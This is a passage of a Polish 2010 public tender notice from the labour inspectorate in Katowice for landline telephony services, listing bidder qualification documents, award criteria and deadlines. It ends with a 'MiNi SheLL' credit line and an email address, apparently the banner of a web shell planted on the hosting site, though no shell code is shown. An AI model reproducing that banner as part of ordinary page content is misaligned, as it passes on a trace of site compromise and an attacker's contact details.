<ul class="kh_indent_1"><li><p>wykonawca musi wykazać się wykonaniem - świadczeniem (w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) co najmniej 2 usług telefonii stacjonarnej (w jednym budynku musi być zlokalizowanych co najmniej 80 numerów wewnętrznych, z możliwością realizacji połączeń zewnętrznych, obsługiwanych przez wykonawcę, a czas realizacji usługi wynosił min. 12 miesięcy), o wartości min. 50 000 zł brutto (za 12 miesięcy); do oferty należy dołączyć wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 2 usług odpowiadających swoim rodzajem i wartościom przedmiotowi zamówienia, tj. usług telefonii stacjonarnej (w jednym budynku musi być zlokalizowanych co najmniej 80 numerów wewnętrznych obsługiwanych przez wykonawcę, a czas realizacji usługi wynosił min. 12 miesięcy, o wartości min. 50.000 zł brutto za 12 miesięcy),  z podaniem dat wykonania ww. usług (data - dzień, miesiąc i rok rozpoczęcia i zakończenia świadczenia usługi), wartości wykonanych usług oraz wskazaniem, co było przedmiotem usługi. Dokument ten ma być załączony w formie oryginału. Należy również dołączyć dokumenty - od podmiotów, na rzecz których usługi wymienione w powyzszym wykazie zostały wykonane - potwierdzające, że przedmiotowe usługi zostały wykonane lub są wykonywane należycie. Dokumenty te należy oznaczyć liczbami porządkowymi odpowiadającymi pozycji w wykazie, której dotyczą. Dokument ten może być dołączony w formie kopii potwierdzonej za zgodność z oryginałem.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca musi posiadać zdolność kredytową lub środki finansowe w wysokości min. 50.000,00 zł; do oferty należy zatem dołączyć informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości min. 50.000,00 zł - wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (dokument ten może być dołączony jako oryginał lub jako kopia potwierdzona za zgodność z oryginałem).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	formularz oferty - załącznik numer 1 do siwz,
2)	informacja o podmiocie wspólnym - załącznik numer 3 do siwz - jeżeli dotyczy,
3)	dokument, o którym mowa w pkt. 1.8 siwz - załącznik numer 2 do siwz,
4)	pełnomocnictwo, o którym mowa w pkt 1.2 siwz - jeżeli dotyczy,
5)	cennik wykonawcy za świadczenie usług telekomunikacyjnych (w zakresie usług telekomunikacyjnych niewymienionych w formularzu cenowym),
6)	dane przedstawiciela handlowego i technicznego - patrz pkt 4 formularza oferty,
7)	ogólne warunki świadczenia usług telekomunikacyjnych obowiązujące u wykonawcy,
8)	formularz cenowy - załącznik nr 7 do siwz.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zaistnienia potrzeby zwiększenia ilości linii telefonicznych w istniejących lokalizacjach zamawiającego (tj. w wymienionych w § 1 umowy - a także w pkt II.1.3 niniejszego ogłoszenia), Wykonawca zobowiązany jest niezwłocznie po otrzymaniu pisemnej/faxem informacji od Zamawiającego (nie później niż następnego dnia roboczego) potwierdzić faxem przyjęcie zamówienia i bezpłatnie zainstalować dodatkową linię w terminie 21 dni roboczych od otrzymania zgłoszenia. Zasady zapłaty za korzystanie z linii/numeru określone są w § 9 umowy.
Zamawiający zastrzega sobie prawo do zmniejszenia przedmiotu umowy w trakcie jej obowiązywania, bez ponoszenia z tego tytułu dodatkowych opłat, kar itp. Zmiany te muszą wynikać ze szczególnych potrzeb Zamawiającego, których nie można przewidzieć w trakcie postępowania i w dniu zawarcia umowy, w szczególności: likwidacja siedziby Zamawiającego, zmiana lokalizacji siedziby, zmiana struktury organizacyjnej, siła wyższa. 
W szczególności Zamawiający ma prawo do zmniejszenia przedmiotu umowy, w przypadku zmiany lokalizacji siedziby, która została wymieniona w § 1 umowy (z zastrzeżeniem § 1 ust. 2 umowy) - przy wykazaniu przez Wykonawcę braku możliwości świadczenia przez niego usług telefonii stacjonarnej w nowym miejscu. W odniesieniu do takiej siedziby umowa przestanie obowiązywać z dniem zakończenia korzystania z usług telefonii stacjonarnej w dotychczasowej lokalizacji. Wykonawca ma obowiązek niezwłocznie powiadomić Zamawiającego w formie pisemnej o niemożności świadczenia usług w nowej lokalizacji, nie później niż na 2 miesiące przed terminem zmiany siedziby</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.pip.gov.pl/pl/bip/przetargi_oip/04_oip_katowice<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Inspekcja Pracy Okręgowy Inspektorat Pracy w Katowicach,
ul. Graniczna 29,
40-017 Katowice,
pok. 121.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2010 godzina 10:00, miejsce: Państwowa Inspekcja Pracy Okręgowy Inspektorat Pracy w Katowicach,
ul. Graniczna 29,
40-017 Katowice,
pok. 216.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com